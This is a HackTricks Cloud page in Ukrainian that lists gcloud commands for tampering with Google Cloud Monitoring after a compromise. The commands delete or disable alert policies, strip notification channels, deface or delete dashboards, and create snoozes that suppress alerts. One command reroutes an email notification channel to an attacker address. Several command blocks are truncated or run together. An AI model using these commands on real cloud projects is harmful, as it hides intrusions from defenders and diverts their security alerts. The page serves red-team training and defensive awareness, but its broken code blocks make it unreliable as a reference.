HackTricks CloudGCP - Monitoring Post Exploitation
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Моніторинг
Для отримання додаткової інформації див.:
Для інших способів порушення логів див.:
GCP - Logging Post Exploitation
monitoring.alertPolicies.delete
Видалити політику оповіщення:
Видалити політику оповіщення
```bash gcloud alpha monitoring policies deletemonitoring.alertPolicies.update
Порушити політику оповіщення:
Порушити політику оповіщення
```bash # Disable policy gcloud alpha monitoring policies updateRemove all notification channels
gcloud alpha monitoring policies update
Chnage notification channels
gcloud alpha monitoring policies update
Modify alert conditions
gcloud alpha monitoring policies update
or use –policy-from-file
</details>
### `monitoring.dashboards.update`
Змініть дашборд, щоб порушити його:
<details>
<summary>Пошкодити дашборд</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
monitoring.dashboards.delete
Видалити дашборд:
Видалити дашборд
```bash # Delete dashboard gcloud monitoring dashboards deletemonitoring.snoozes.create
Запобігти генерації сповіщень політиками, створивши snoozer:
Створити snoozer, щоб зупинити сповіщення
```bash # Stop alerts by creating a snoozer gcloud monitoring snoozes create --display-name="Maintenance Week" \ --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ --start-time="2023-03-01T03:00:00.0-0500" \ --end-time="2023-03-07T23:59:59.5-0500" ```monitoring.snoozes.update
Оновіть час snoozer-а, щоб запобігти створенню сповіщень у моменти, коли атакуючий зацікавлений:
Оновити час snoozer-а
```bash # Modify the timing of a snooze gcloud monitoring snoozes updateodify everything, including affected policies
gcloud monitoring snoozes update
</details>
### `monitoring.notificationChannels.delete`
Видалити налаштований канал:
<details>
<summary>Видалити канал сповіщень</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
monitoring.notificationChannels.update
Оновіть мітки каналу, щоб порушити його роботу:
Оновити мітки каналу сповіщень
```bash # Delete or update labels, for example email channels have the email indicated here gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com ```Tip
Вивчайте та практикуйте AWS Hacking:
Вивчайте та практикуйте GCP Hacking:Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.